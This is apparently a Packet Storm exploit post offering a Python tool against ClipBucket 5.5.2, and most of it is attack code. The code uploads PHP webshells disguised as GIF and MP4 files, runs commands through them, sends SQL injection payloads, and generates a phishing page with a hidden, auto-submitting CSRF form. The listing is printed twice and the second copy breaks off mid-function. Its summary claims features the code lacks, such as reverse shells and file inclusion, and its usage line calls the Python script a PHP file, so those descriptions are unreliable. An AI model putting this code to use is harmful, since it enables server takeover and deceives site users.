6.5
/ 10
MEDIUM
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
Description
An enhanced Python penetration testing tool designed specifically for ClipBucket video sharing platform vulnerability assessment and exploitation. It checks for remote command execution, file upload, SQL injection, local file inclusion, and more. It...
Basic Information
ID
PACKETSTORM:212539
Published
Dec 8, 2025 at 00:00
Affected Product
Affected Versions
=============================================================================================================================================
| # Title : ClipBucket 5.5.2 Build 90 Practical Exploitation Tool |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : https://github.com/MacWarrior/clipbucket-v5/ |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/211129/ & CVE-2025-55911
[+] Summary : An enhanced Python penetration testing tool designed specifically for ClipBucket video sharing platform vulnerability assessment and exploitation.Key Capabilities
1. Advanced RCE (Remote Code Execution)
Multiple PHP shell payloads (c99, WSO-style, reverse shell)
Bypass techniques: Double extensions, null byte injection, MIME type spoofing
Smart detection: Automatic shell validation and access level assessment
Post-exploitation: Auto-commands for system enumeration
2. File Upload Exploitation
6 different payload types with various obfuscation methods
Multiple upload endpoints: Standard, AJAX, action-based
Response analysis: Smart parsing of upload responses to locate shells
Success verification: Automated shell testing with command execution
3. SQL Injection Attacks
Comprehensive testing: Union-based, Error-based, Time-based, Blind SQLi
Data extraction: Automatic database/table/column enumeration
Detailed reporting: Complete payload analysis and exploitation examples
Multi-endpoint testing: Tests multiple potential injection points
4. Additional Attack Vectors
LFI (Local File Inclusion): /etc/passwd, config files, PHP filter wrappers
Directory brute-forcing: 20-thread concurrent scanning for hidden paths
CSRF exploitation: Attack vector identification and PoC generation
Admin panel discovery: Common ClipBucket admin paths
[+] Usage : * : Save this file as: exploit.php
Run: php exploit.php
[+] POC :
#!/usr/bin/env python3
"""
ClipBucket Practical Exploitation Tool
"""
import requests
import json
import time
import random
import os
import sys
import re
import urllib3
from urllib.parse import urlparse
# تعطيل تحذيرات SSL
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
class ClipBucketExploiter:
def __init__(self, target_url):
self.target = target_url.rstrip('/')
self.session = requests.Session()
self.session.verify = False
self.session.timeout = 10
# إعداد headers
self.session.headers.update({
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
'Accept': '*/*',
'Accept-Language': 'en-US,en;q=0.9',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
'X-Requested-With': 'XMLHttpRequest'
})
self.vulnerabilities = []
self.shell_urls = []
def print_status(self, message, status="info"):
"""طباعة رسالة باللون المناسب"""
colors = {
"info": "\033[96m", # أزرق سماوي
"success": "\033[92m", # أخضر
"warning": "\033[93m", # أصفر
"error": "\033[91m", # أحمر
"critical": "\033[95m" # بنفسجي
}
color = colors.get(status, "\033[97m")
print(f"{color}[{status.upper()}] {message}\033[0m")
def check_clipbucket(self):
"""التحقق مما إذا كان الموقع يستخدم ClipBucket"""
self.print_status("Checking if website uses ClipBucket...", "info")
try:
# فحص الصفحة الرئيسية
resp = self.session.get(self.target)
# علامات ClipBucket
indicators = [
'clipbucket', 'CB', 'upload.php', 'video_upload',
'action=upload', 'file_uploader', 'video-upload',
'videobb', 'my_videos', 'video_manager'
]
found = []
for indicator in indicators:
if indicator.lower() in resp.text.lower():
found.append(indicator)
if found:
self.print_status(f"ClipBucket indicators found: {', '.join(found[:3])}", "success")
# فحص upload.php مباشرة
upload_test = f"{self.target}/upload.php"
try:
upload_resp = self.session.get(upload_test, timeout=5)
if upload_resp.status_code == 200:
self.print_status("upload.php is accessible!", "success")
return True
else:
self.print_status(f"upload.php returned status: {upload_resp.status_code}", "warning")
except:
self.print_status("upload.php is not accessible", "warning")
return True
else:
self.print_status("No clear ClipBucket indicators found", "warning")
return False
except Exception as e:
self.print_status(f"Connection error: {str(e)}", "error")
return False
def test_upload_endpoint(self):
"""اختبار نقطة رفع الملفات"""
self.print_status("Testing upload.php endpoint...", "info")
upload_url = f"{self.target}/upload.php"
# اختبار HEAD أولاً
try:
head_resp = self.session.head(upload_url, timeout=5)
self.print_status(f"HEAD request: Status {head_resp.status_code}", "info")
except:
pass
# اختبار GET
try:
get_resp = self.session.get(upload_url, timeout=5)
self.print_status(f"GET request: Status {get_resp.status_code}, Size: {len(get_resp.text)} chars", "info")
# البحث عن علامات نموذج الرفع
if 'upload' in get_resp.text.lower() or 'file' in get_resp.text.lower():
self.print_status("Upload form detected", "success")
return True
else:
self.print_status("No upload form detected in response", "warning")
return False
except Exception as e:
self.print_status(f"Error testing upload endpoint: {str(e)}", "error")
return False
def exploit_file_upload(self):
"""استغلال ثغرة رفع الملفات"""
self.print_status("Attempting file upload exploitation...", "info")
# بايلودات مختلفة
payloads = [
{
'filename': 'test.php',
'content': b'<?php echo "VULNERABLE"; ?>',
'mime': 'application/x-php'
},
{
'filename': 'shell.php.gif',
'content': b'GIF89a<?php system($_GET["cmd"]); ?>',
'mime': 'image/gif'
},
{
'filename': 'exploit.mp4.php',
'content': b'\x00\x00\x00\x18ftypmp42\x00\x00\x00\x00mp42isom<?php echo shell_exec($_GET["c"]); ?>',
'mime': 'video/mp4'
}
]
for payload in payloads:
self.print_status(f"Trying payload: {payload['filename']}", "info")
files = {
'Filedata': (payload['filename'], payload['content'], payload['mime'])
}
data = {
'title': 'Test Video Upload',
'collection_id': '1'
}
try:
response = self.session.post(f"{self.target}/upload.php",
files=files,
data=data,
timeout=15)
self.print_status(f"Response status: {response.status_code}", "info")
self.print_status(f"Response preview: {response.text[:200]}", "info")
# تحليل الرد
if response.status_code == 200:
# البحث عن إشارات النجاح
success_keywords = ['success', 'file_name', 'uploaded', 'complete', 'yes']
for keyword in success_keywords:
if keyword in response.text.lower():
self.print_status(f"Upload successful! Keyword '{keyword}' found", "success")
# محاولة استخراج اسم الملف
filename = self.extract_filename(response.text)
if filename:
shell_url = f"{self.target}/temp/{filename}"
self.shell_urls.append(shell_url)
self.print_status(f"Potential shell: {shell_url}", "critical")
# اختبار الشل
self.test_shell_access(shell_url, payload['filename'])
return True
# تحليل JSON
try:
json_data = json.loads(response.text)
if 'file_name' in json_data:
filename = json_data['file_name']
shell_url = f"{self.target}/temp/{filename}"
self.shell_urls.append(shell_url)
self.print_status(f"JSON response - Shell: {shell_url}", "critical")
return True
except:
pass
except Exception as e:
self.print_status(f"Upload error: {str(e)}", "error")
return False
def extract_filename(self, response_text):
"""استخراج اسم الملف من الرد"""
patterns = [
r'"file_name"\s*:\s*"([^"]+)"',
r"'file_name'\s*:\s*'([^']+)'",
r'file_name["\']?\s*[:=]\s*["\']?([a-zA-Z0-9._-]+)',
r'filename["\']?\s*[:=]\s*["\']?([a-zA-Z0-9._-]+)'
]
for pattern in patterns:
matches = re.findall(pattern, response_text)
if matches:
filename = matches[0]
# إضافة امتداد إذا لم يكن موجوداً
if '.' not in filename:
filename += '.mp4'
return filename
return None
def test_shell_access(self, shell_url, original_filename):
"""اختبار الوصول إلى الشل"""
self.print_status(f"Testing shell access: {shell_url}", "info")
# بناء على نوع الملف
if '.php' in original_filename.lower():
# اختبار PHP shell
test_url = f"{shell_url}?cmd=echo+CLIPBUCKET_TEST"
try:
response = self.session.get(test_url, timeout=10)
if 'CLIPBUCKET_TEST' in response.text:
self.print_status("PHP shell is ACTIVE!", "success")
# جلب معلومات النظام
info_url = f"{shell_url}?cmd=whoami && pwd"
info_response = self.session.get(info_url, timeout=10)
self.print_status(f"System info: {info_response.text[:100]}", "success")
# حفظ رابط الشل
with open('shells_found.txt', 'a') as f:
f.write(f"{shell_url}\n")
f.write(f"Test command: {shell_url}?cmd=whoami\n")
f.write(f"Response: {info_response.text[:200]}\n\n")
return True
except:
pass
# محاولة الوصول المباشر
try:
direct_response = self.session.get(shell_url, timeout=10)
if direct_response.status_code == 200:
self.print_status(f"File is accessible (status: {direct_response.status_code})", "success")
return True
except:
pass
self.print_status("Shell access test failed", "warning")
return False
def exploit_csrf(self):
"""استغلال ثغرة CSRF"""
self.print_status("Testing for CSRF vulnerability...", "info")
test_data = {
'updateVideo': '1',
'videoid': '99999', # ID عالي لتجنب التأثير على فيديوهات حقيقية
'title': 'CSRF Security Test',
'desc': 'This is a security test for CSRF vulnerability',
'tags': 'test,security,csrf'
}
try:
response = self.session.post(f"{self.target}/upload.php", data=test_data, timeout=10)
self.print_status(f"CSRF test response status: {response.status_code}", "info")
self.print_status(f"Response preview: {response.text[:150]}", "info")
if response.status_code == 200:
if 'valid' in response.text.lower() or 'success' in response.text.lower():
self.print_status("CSRF vulnerability CONFIRMED!", "success")
self.vulnerabilities.append('CSRF')
# إنشاء صفحة استغلال
self.create_csrf_exploit_page()
return True
else:
self.print_status("CSRF protection might be enabled", "warning")
except Exception as e:
self.print_status(f"CSRF test error: {str(e)}", "error")
return False
def create_csrf_exploit_page(self):
"""إنشاء صفحة استغلال CSRF"""
exploit_html = f'''<!DOCTYPE html>
<html>
<head>
<title>Free Premium Access</title>
<style>
body {{
font-family: Arial, sans-serif;
text-align: center;
padding: 50px;
background: linear-gradient(135deg, #667eea 0%, #764ba2 100%);
color: white;
}}
.container {{
background: rgba(255,255,255,0.1);
padding: 30px;
border-radius: 15px;
backdrop-filter: blur(10px);
max-width: 600px;
margin: 0 auto;
}}
button {{
background: #4CAF50;
color: white;
padding: 15px 30px;
border: none;
border-radius: 8px;
font-size: 18px;
cursor: pointer;
margin: 20px;
}}
button:hover {{
background: #45a049;
}}
</style>
</head>
<body>
<div class="container">
<h1> Claim Your Free Premium Account!</h1>
<p>Click the button below to activate premium features</p>
<form id="attack" action="{self.target}/upload.php" method="POST" style="display:none;">
<input type="hidden" name="updateVideo" value="1">
<input type="hidden" name="videoid" value="1">
<input type="hidden" name="title" value="ACCOUNT HACKED">
<input type="hidden" name="desc" value="This account was compromised via CSRF">
<input type="hidden" name="tags" value="hacked">
</form>
<button onclick="launchAttack()">
ACTIVATE NOW
</button>
<script>
function launchAttack() {{
document.getElementById('attack').submit();
alert('Premium activated!');
}}
// Auto-attack after 5 seconds
setTimeout(launchAttack, 5000);
</script>
</div>
</body>
</html>'''
with open('csrf_attack.html', 'w', encoding='utf-8') as f:
f.write(exploit_html)
self.print_status("CSRF exploit page created: csrf_attack.html", "success")
def test_sqli(self):
"""اختبار ثغرة SQL Injection"""
self.print_status("Testing for SQL Injection...", "info")
test_payloads = [
("1' OR '1'='1", "Basic boolean"),
("1' AND SLEEP(5)--", "Time-based"),
("1' UNION SELECT NULL,version()--", "Union injection")
]
for payload, description in test_payloads:
self.print_status(f"Testing: {description}", "info")
test_data = {
'getForm': '1',
'vid': payload,
'objId': 'test',
'title': 'SQLi Test'
}
try:
if 'SLEEP' in payload:
start_time = time.time()
response = self.session.post(f"{self.target}/upload.php", data=test_data, timeout=15)
elapsed = time.time() - start_time
if elapsed > 4:
self.print_status(f"Time-based SQLi detected! Delay: {elapsed:.2f} seconds", "success")
self.vulnerabilities.append('SQL Injection (Time-based)')
return True
else:
response = self.session.post(f"{self.target}/upload.php", data=test_data, timeout=10)
error_indicators = ['sql', 'SQL', 'mysql', 'MySQL', 'syntax error', 'query', 'database']
for indicator in error_indicators:
if indicator.lower() in response.text.lower():
self.print_status(f"Error-based SQLi detected: {indicator}", "success")
self.vulnerabilities.append('SQL Injection (Error-based)')
with open('sqli_evidence.txt', 'w') as f:
f.write(f"Payload: {payload}\n")
f.write(f"Response:\n{response.text}\n")
return True
except Exception as e:
self.print_status(f"SQLi test error: {str(e)}", "error")
self.print_status("No SQL injection vulnerability detected", "warning")
return False
def find_admin_panel(self):
"""البحث عن لوحة التحكم"""
self.print_status("Searching for admin panel...", "info")
common_paths = [
'/admin',
'/admin_area',
'/administrator',
'/admin.php',
'/admin/login.php',
'/admin/index.php',
'/dashboard',
'/controlpanel',
'/cp',
'/admincp',
'/cb_admin',
'/clipbucket_admin',
'/admin_dashboard',
'/manage',
'/manager'
]
found_panels = []
for path in common_paths:
url = f"{self.target}{path}"
try:
# طلب HEAD أولاً (أسرع)
head_resp = self.session.head(url, timeout=3, allow_redirects=False)
if head_resp.status_code < 400:
# طلب GET للتحقق من المحتوى
get_resp = self.session.get(url, timeout=5)
# تحقق من أن الصفحة تحتوي على علامات لوحة تحكم
if any(keyword in get_resp.text.lower() for keyword in ['login', 'admin', 'dashboard', 'control', 'manage', 'panel']):
self.print_status(f"Admin panel found: {url}", "success")
found_panels.append(url)
# حفظ المحتوى للفحص
with open('admin_panel_found.txt', 'a') as f:
f.write(f"URL: {url}\n")
f.write(f"Status: {get_resp.status_code}\n")
f.write(f"Size: {len(get_resp.text)} chars\n")
f.write("-" * 50 + "\n")
except:
continue
if found_panels:
self.print_status(f"Found {len(found_panels)} admin panels", "success")
return found_panels
else:
self.print_status("No admin panels found", "warning")
return []
def scan_directories(self):
"""مسح الدلائل المهمة"""
self.print_status("Scanning for important directories...", "info")
directories = [
'/uploads',
'/upload',
'/files',
'/temp',
'/tmp',
'/logs',
'/backup',
'/backups',
'/data',
'/database',
'/config',
'/includes',
'/install',
'/upgrade',
'/assets',
'/images',
'/videos',
'/media'
]
found_dirs = []
for directory in directories:
url = f"{self.target}{directory}"
try:
response = self.session.head(url, timeout=3)
if response.status_code < 400:
self.print_status(f"Directory found: {url} (Status: {response.status_code})", "success")
found_dirs.append(url)
except:
pass
return found_dirs
def generate_report(self):
"""توليد تقرير النتائج"""
self.print_status("\n" + "="*60, "info")
self.print_status("EXPLOITATION REPORT", "critical")
self.print_status("="*60, "info")
report = []
report.append(f"Target: {self.target}")
report.append(f"Scan Time: {time.strftime('%Y-%m-%d %H:%M:%S')}")
report.append("")
# الثغرات المكتشفة
if self.vulnerabilities or self.shell_urls:
report.append("VULNERABILITIES FOUND:")
report.append("-" * 40)
for vuln in self.vulnerabilities:
report.append(f"✓ {vuln}")
if self.shell_urls:
report.append(f"✓ Remote Code Execution: {len(self.shell_urls)} shells deployed")
for i, shell in enumerate(self.shell_urls, 1):
report.append(f" Shell {i}: {shell}")
report.append("")
# التوصيات
report.append("RECOMMENDATIONS:")
report.append("-" * 40)
if 'CSRF' in self.vulnerabilities:
report.append("• Implement CSRF tokens on all forms")
if 'SQL Injection' in ' '.join(self.vulnerabilities):
report.append("• Use prepared statements for database queries")
if self.shell_urls:
report.append("• Implement strict file upload validation")
report.append("• Disable PHP execution in upload directories")
else:
report.append("No critical vulnerabilities found")
report.append("")
report.append("FILES GENERATED:")
report.append("-" * 40)
# عرض الملفات المولدة
files_to_check = ['shells_found.txt', 'csrf_attack.html',
'admin_panel_found.txt', 'sqli_evidence.txt']
for file in files_to_check:
if os.path.exists(file):
report.append(f"• {file}")
# كتابة التقرير
report_text = "\n".join(report)
print("\n" + report_text)
with open('exploitation_report.txt', 'w', encoding='utf-8') as f:
f.write(report_text)
self.print_status("\nReport saved to: exploitation_report.txt", "success")
def run_complete_scan(self):
"""تشغيل مسح شامل"""
self.print_status("Starting complete ClipBucket vulnerability scan...", "info")
# الخطوة 1: التحقق من ClipBucket
if not self.check_clipbucket():
self.print_status("Target doesn't appear to be ClipBucket. Stopping scan.", "error")
return
# الخطوة 2: اختبار upload.php
if not self.test_upload_endpoint():
self.print_status("upload.php not functioning properly", "warning")
# الخطوة 3: استغلال رفع الملفات
self.exploit_file_upload()
# الخطوة 4: اختبار CSRF
self.exploit_csrf()
# الخطوة 5: اختبار SQL Injection
self.test_sqli()
# الخطوة 6: البحث عن لوحة التحكم
self.find_admin_panel()
# الخطوة 7: مسح الدلائل
self.scan_directories()
# الخطوة 8: التقرير النهائي
self.generate_report()
def main():
"""الدالة الرئيسية"""
print("\033[95m" + """
╔══════════════════════════════════════════════════════╗
║ ClipBucket Exploitation Scanner ║
║ By indoushka ║
╚══════════════════════════════════════════════════════╝
""" + "\033[0m")
if len(sys.argv) < 2:
print("Usage:")
print(f" python {sys.argv[0]} <target_url>")
print("\nExamples:")
print(f" python {sys.argv[0]} https://example.com")
print(f" python {sys.argv[0]} http://192.168.1.100")
print(f" python {sys.argv[0]} http://localhost/clipbucket")
return
target = sys.argv[1]
# إضافة http:// إذا لم يكن موجوداً
if not target.startswith(('http://', 'https://')):
target = 'http://' + target
# إنشاء واستخدام الكلاس
exploiter = ClipBucketExploiter(target)
try:
exploiter.run_complete_scan()
except KeyboardInterrupt:
print("\n\nScan interrupted by user")
except Exception as e:
print(f"\nError during scan: {str(e)}")
if __name__ == "__main__":
main()
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
| # Title : ClipBucket 5.5.2 Build 90 Practical Exploitation Tool |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : https://github.com/MacWarrior/clipbucket-v5/ |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/211129/ & CVE-2025-55911
[+] Summary : An enhanced Python penetration testing tool designed specifically for ClipBucket video sharing platform vulnerability assessment and exploitation.Key Capabilities
1. Advanced RCE (Remote Code Execution)
Multiple PHP shell payloads (c99, WSO-style, reverse shell)
Bypass techniques: Double extensions, null byte injection, MIME type spoofing
Smart detection: Automatic shell validation and access level assessment
Post-exploitation: Auto-commands for system enumeration
2. File Upload Exploitation
6 different payload types with various obfuscation methods
Multiple upload endpoints: Standard, AJAX, action-based
Response analysis: Smart parsing of upload responses to locate shells
Success verification: Automated shell testing with command execution
3. SQL Injection Attacks
Comprehensive testing: Union-based, Error-based, Time-based, Blind SQLi
Data extraction: Automatic database/table/column enumeration
Detailed reporting: Complete payload analysis and exploitation examples
Multi-endpoint testing: Tests multiple potential injection points
4. Additional Attack Vectors
LFI (Local File Inclusion): /etc/passwd, config files, PHP filter wrappers
Directory brute-forcing: 20-thread concurrent scanning for hidden paths
CSRF exploitation: Attack vector identification and PoC generation
Admin panel discovery: Common ClipBucket admin paths
[+] Usage : * : Save this file as: exploit.php
Run: php exploit.php
[+] POC :
#!/usr/bin/env python3
"""
ClipBucket Practical Exploitation Tool
"""
import requests
import json
import time
import random
import os
import sys
import re
import urllib3
from urllib.parse import urlparse
# تعطيل تحذيرات SSL
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
class ClipBucketExploiter:
def __init__(self, target_url):
self.target = target_url.rstrip('/')
self.session = requests.Session()
self.session.verify = False
self.session.timeout = 10
# إعداد headers
self.session.headers.update({
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
'Accept': '*/*',
'Accept-Language': 'en-US,en;q=0.9',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
'X-Requested-With': 'XMLHttpRequest'
})
self.vulnerabilities = []
self.shell_urls = []
def print_status(self, message, status="info"):
"""طباعة رسالة باللون المناسب"""
colors = {
"info": "\033[96m", # أزرق سماوي
"success": "\033[92m", # أخضر
"warning": "\033[93m", # أصفر
"error": "\033[91m", # أحمر
"critical": "\033[95m" # بنفسجي
}
color = colors.get(status, "\033[97m")
print(f"{color}[{status.upper()}] {message}\033[0m")
def check_clipbucket(self):
"""التحقق مما إذا كان الموقع يستخدم ClipBucket"""
self.print_status("Checking if website uses ClipBucket...", "info")
try:
# فحص الصفحة الرئيسية
resp = self.session.get(self.target)
# علامات ClipBucket
indicators = [
'clipbucket', 'CB', 'upload.php', 'video_upload',
'action=upload', 'file_uploader', 'video-upload',
'videobb', 'my_videos', 'video_manager'
]
found = []
for indicator in indicators:
if indicator.lower() in resp.text.lower():
found.append(indicator)
if found:
self.print_status(f"ClipBucket indicators found: {', '.join(found[:3])}", "success")
# فحص upload.php مباشرة
upload_test = f"{self.target}/upload.php"
try:
upload_resp = self.session.get(upload_test, timeout=5)
if upload_resp.status_code == 200:
self.print_status("upload.php is accessible!", "success")
return True
else:
self.print_status(f"upload.php returned status: {upload_resp.status_code}", "warning")
except:
self.print_status("upload.php is not accessible", "warning")
return True
else:
self.print_status("No clear ClipBucket indicators found", "warning")
return False
except Exception as e:
self.print_status(f"Connection error: {str(e)}", "error")
return False
def test_upload_endpoint(self):
"""اختبار نقطة رفع الملفات"""
self.print_status("Testing upload.php endpoint...", "info")
upload_url = f"{self.target}/upload.php"
# اختبار HEAD أولاً
try:
head_resp = self.session.head(upload_url, timeout=5)
self.print_status(f"HEAD request: Status {head_resp.status_code}", "info")
except:
pass
# اختبار GET
try:
get_resp = self.session.get(upload_url, timeout=5)
self.print_status(f"GET request: Status {get_resp.status_code}, Size: {len(get_resp.text)} chars", "info")
# البحث عن علامات نموذج الرفع
if 'upload' in get_resp.text.lower() or 'file' in get_resp.text.lower():
self.print_status("Upload form detected", "success")
return True
else:
self.print_status("No upload form detected in response", "warning")
return False
except Exception as e:
self.print_status(f"Error testing upload endpoint: {str(e)}", "error")
return False
def exploit_file_upload(self):
"""استغلال ثغرة رفع الملفات"""
self.print_status("Attempting file upload exploitation...", "info")
# بايلودات مختلفة
payloads = [
{
'filename': 'test.php',
'content': b'<?php echo "VULNERABLE"; ?>',
'mime': 'application/x-php'
},
{
'filename': 'shell.php.gif',
'content': b'GIF89a<?php system($_GET["cmd"]); ?>',
'mime': 'image/gif'
},
{
'filename': 'exploit.mp4.php',
'content': b'\x00\x00\x00\x18ftypmp42\x00\x00\x00\x00mp42isom<?php echo shell_exec($_GET["c"]); ?>',
'mime': 'video/mp4'
}
]
for payload in payloads:
self.print_status(f"Trying payload: {payload['filename']}", "info")
files = {
'Filedata': (payload['filename'], payload['content'], payload['mime'])
}
data = {
'title': 'Test Video Upload',
'collection_id': '1'
}
try:
response = self.session.post(f"{self.target}/upload.php",
files=files,
data=data,
timeout=15)
self.print_status(f"Response status: {response.status_code}", "info")
self.print_status(f"Response preview: {response.text[:200]}", "info")
# تحليل الرد
if response.status_code == 200:
# البحث عن إشارات النجاح
success_keywords = ['success', 'file_name', 'uploaded', 'complete', 'yes']
for keyword in success_keywords:
if keyword in response.text.lower():
self.print_status(f"Upload successful! Keyword '{keyword}' found", "success")
# محاولة استخراج اسم الملف
filename = self.extract_filename(response.text)
if filename:
shell_url = f"{self.target}/temp/{filename}"
self.shell_urls.append(shell_url)
self.print_status(f"Potential shell: {shell_url}", "critical")
# اختبار الشل
self.test_shell_access(shell_url, payload['filename'])
return True
# تحليل JSON
try:
json_data = json.loads(response.text)
if 'file_name' in json_data:
filename = json_data['file_name']
shell_url = f"{self.target}/temp/{filename}"
self.shell_urls.append(shell_url)
self.print_status(f"JSON response - Shell: {shell_url}", "critical")
return True
except:
pass
except Exception as e:
self.print_status(f"Upload error: {str(e)}", "error")
return False
def extract_filename(self, response_text):
"""استخراج اسم الملف من الرد"""
patterns = [
r'"file_name"\s*:\s*"([^"]+)"',
r"'file_name'\s*:\s*'([^']+)'",
r'file_name["\']?\s*[:=]\s*["\']?([a-zA-Z0-9._-]+)',
r'filename["\']?\s*[:=]\s*["\']?([a-zA-Z0-9._-]+)'
]
for pattern in patterns:
matches = re.findall(pattern, response_text)
if matches:
filename = matches[0]
# إضافة امتداد إذا لم يكن موجوداً
if '.' not in filename:
filename += '.mp4'
return filename
return None
def test_shell_access(self, shell_url, original_filename):
"""اختبار الوصول إلى الشل"""
self.print_status(f"Testing shell access: {shell_url}", "info")
# بناء على نوع الملف
if '.php' in original_filename.lower():
# اختبار PHP shell
test_url = f"{shell_url}?cmd=echo+CLIPBUCKET_TEST"
try:
response = self.session.get(test_url, timeout=10)
if 'CLIPBUCKET_TEST' in response.text:
self.print_status("PHP shell is ACTIVE!", "success")
# جلب معلومات النظام
info_url = f"{shell_url}?cmd=whoami && pwd"
info_response = self.session.get(info_url, timeout=10)
self.print_status(f"System info: {info_response.text[:100]}", "success")
# حفظ رابط الشل
with open('shells_found.txt', 'a') as f:
f.write(f"{shell_url}\n")
f.write(f"Test command: {shell_url}?cmd=whoami\n")
f.write(f"Response: {info_response.text[:200]}\n\n")
return True
except:
pass
# محاولة الوصول المباشر
try:
direct_response = self.session.get(shell_url, timeout=10)
if direct_response.status_code == 200:
self.print_status(f"File is accessible (status: {direct_response.status_code})", "success")
return True
except:
pass
self.print_status("Shell access test failed", "warning")
return False
def exploit_csrf(self):
"""استغلال ثغرة CSRF"""
self.print_status("Testing for CSRF vulnerability...", "info")
test_data = {
'updateVideo': '1',
'videoid': '99999', # ID عالي لتجنب التأثير على فيديوهات حقيقية
'title': 'CSRF Security Test',
'desc': 'This is a security test for CSRF vulnerability',
'tags': 'test,security,csrf'
}
try:
response = self.session.post(f"{self.target}/upload.php", data=test_data, timeout=10)
self.print_status(f"CSRF test response status: {response.status_code}", "info")
self.print_status(f"Response preview: {response.text[:150]}", "info")
if response.status_code == 200:
if 'valid' in response.text.lower() or 'success' in response.text.lower():
self.print_status("CSRF vulnerability CONFIRMED!", "success")
self.vulnerabilities.append('CSRF')
# إنشاء صفحة استغلال
self.create_csrf_exploit_page()
return True
else:
self.print_status("CSRF protection might be enabled", "warning")
except Exception as e:
self.print_status(f"CSRF test error: {str(e)}", "error")
return False
def create_csrf_exploit_page(self):
"""إنشاء صفحة استغلال CSRF"""
exploit_html = f'''<!DOCTYPE html>
<html>
<head>
<title>Free Premium Access</title>
<style>
body {{
font-family: Arial, sans-serif;
text-align: center;
padding: 50px;
background: linear-gradient(135deg, #667eea 0%, #764ba2 100%);
color: white;
}}
.container {{
background: rgba(255,255,255,0.1);
padding: 30px;
border-radius: 15px;
backdrop-filter: blur(10px);
max-width: 600px;
margin: 0 auto;
}}
button {{
background: #4CAF50;
color: white;
padding: 15px 30px;
border: none;
border-radius: 8px;
font-size: 18px;
cursor: pointer;
margin: 20px;
}}
button:hover {{
background: #45a049;
}}
</style>
</head>
<body>
<div class="container">
<h1> Claim Your Free Premium Account!</h1>
<p>Click the button below to activate premium features</p>
<form id="attack" action="{self.target}/upload.php" method="POST" style="display:none;">
<input type="hidden" name="updateVideo" value="1">
<input type="hidden" name="videoid" value="1">
<input type="hidden" name="title" value="ACCOUNT HACKED">
<input type="hidden" name="desc" value="This account was compromised via CSRF">
<input type="hidden" name="tags" value="hacked">
</form>
<button onclick="launchAttack()">
ACTIVATE NOW
</button>
<script>
function launchAttack() {{
document.getElementById('attack').submit();
alert('Premium activated!');
}}
// Auto-attack after 5 seconds
setTimeout(launchAttack, 5000);
</script>
</div>
</body>
</html>'''
with open('csrf_attack.html', 'w', encoding='utf-8') as f:
f.write(exploit_html)
self.print_status("CSRF exploit page created: csrf_attack.html", "success")
def test_sqli(self):
"""اختبار ثغرة SQL Injection"""
self.print_status("Testing for SQL Injection...", "info")
test_payloads = [
("1' OR '1'='1", "Basic boolean"),
("1' AND SLEEP(5)--", "Time-based"),
("1' UNION SELECT NULL,version()--", "Union injection")
]
for payload, description in test_payloads:
self.print_status(f"Testing: {description}", "info")
test_data = {
'getForm': '1',
'vid': payload,
'objId': 'test',
'title': 'SQLi Test'
}
try:
if 'SLEEP' in payload:
start_time = time.time()
response = self.session.post(f"{self.target}/upload.php", data=test_data, timeout=15)
elapsed = time.time() - start_time
if elapsed > 4:
self.print_status(f"Time-based SQLi detected! Delay: {elapsed:.2f} seconds", "success")
self.vulnerabilities.append('SQL Injection (Time-based)')
return True
else:
response = self.session.post(f"{self.target}/upload.php", data=test_data, timeout=10)
error_indicators = ['sql', 'SQL', 'mysql', 'MySQL', 'syntax error', 'query', 'database']
for indicator in error_indicators:
if indicator.lower() in response.text.lower():
self.print_status(f"Error-based SQLi detected: {indicator}", "success")
self.vulnerabilities.append('SQL Injection (Error-based)')
with open('sqli_evidence.txt', 'w') as f:
f.write(f"Payload: {payload}\n")
f.write(f"Response:\n{response.text}\n")
return True
except Exception as e:
self.print_status(f"SQLi test error: {str(e)}", "error")
self.print_status("No SQL injection vulnerability detected", "warning")
return False
def find_admin_panel(self):
"""البحث عن لوحة التحكم"""
self.print_status("Searching for admin panel...", "info")
common_paths = [
'/admin',
'/admin_area',
'/administrator',
'/admin.php',
'/admin/login.php',
'/admin/index.php',
'/dashboard',
'/controlpanel',
'/cp',
'/admincp',
'/cb_admin',
'/clipbucket_admin',
'/admin_dashboard',
'/manage',
'/manager'
]
found_panels = []
for path in common_paths:
url = f"{self.target}{path}"
try:
# طلب HEAD أولاً (أسرع)
head_resp = self.session.head(url, timeout=3, allow_redirects=False)
if head_resp.status_code < 400:
# طلب GET للتحقق من المحتوى
get_resp = self.session.get(url, timeout=5)
# تحقق من أن الصفحة تحتوي على علامات لوحة تحكم
if any(keyword in get_resp.text.lower() for keyword in ['login', 'admin', 'dashboard', 'control', 'manage', 'panel']):
self.print_status(f"Admin panel found: {url}", "success")
found_panels.append(url)
# حفظ المحتوى للفحص
with open('admin_panel_found.txt', 'a') as f:
f.write(f"URL: {url}\n")
f.write(f"Status: {get_resp.status_code}\n")
f.write(f"Size: {len(get_resp.text)} chars\n")
f.write("-" * 50 + "\n")
except:
continue
if found_panels:
self.print_status(f"Found {len(found_panels)} admin panels", "success")
return found_panels
else:
self.print_status("No admin panels found", "warning")
return []
def scan_directories(self):
"""مسح الدلائل المهمة"""
self.print_status("Scanning for important directories...", "info")
directories = [
'/uploads',
'/upload',
'/files',
'/temp',
'/tmp',
'/logs',
'/backup',
'/backups',
'/data',
'/database',
'/config',
'/includes',
'/install',
'/upgrade',
'/assets',
'/images',
'/videos',
'/media'
]
found_dirs = []
for directory in directories:
url = f"{self.target}{directory}"
try:
response = self.session.head(url, timeout=3)
if response.status_code < 400:
self.print_status(f"Directory found: {url} (Status: {response.status_code})", "success")
found_dirs.append(url)
except:
pass
return found_dirs
def generate_report(self):
"""توليد تقرير النتائج"""
self.print_status("\n" + "="*60, "info")
self.print_status("EXPLOITATION REPORT", "critical")
